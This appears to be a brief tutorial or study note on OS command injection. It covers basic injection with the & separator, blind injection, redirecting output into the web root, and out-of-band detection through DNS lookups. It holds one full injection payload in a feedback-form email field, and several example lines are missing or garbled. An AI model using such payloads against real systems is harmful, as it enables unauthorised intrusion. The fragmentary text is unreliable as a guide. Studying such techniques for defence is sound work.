OS Command Injection
PRACTICE ! PRACTICE ! PRACTICE !
OS command injection is a security vuln which allows an attacker to exec os commands on the server that is running an application.
Executing arbitrary commands
To provide the stock information, the application calls out the shell command with product and store ID's as arguments. stockreport.p1 381 29
This command outputs the stock status for the specified item, which is returned to the user.
An Attacker can,
If this is the modified input for the above url then it would look something like :
The echo command will simply echo the string and meanwhile the & is a bash separator.
Blind OS command injection
Modern days instances are actually blind OS injections, which does not return the output.
A web site that lets users submit feedback about the site. The user enters their email address and feedback message.
The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details.
The output of the mail command is not returned in the application response. To detect this BLIND OS vuln, we can
Blind OS Command Injection by redirecting output
We can redirect the os command's output into a file within the web-root and we can retrieve it through the browser.
We can now retrieve it using :
Submit Feedback Form : email=t||whoami > /var/www/images/whoami.txt||
Blind OS Command Injection using out-of-band technique
An injected command that will trigger an out-of-band network interaction with a system that you control.
This payload uses the nslookup command to cause a DNS lookup for a specified domain.
Last updated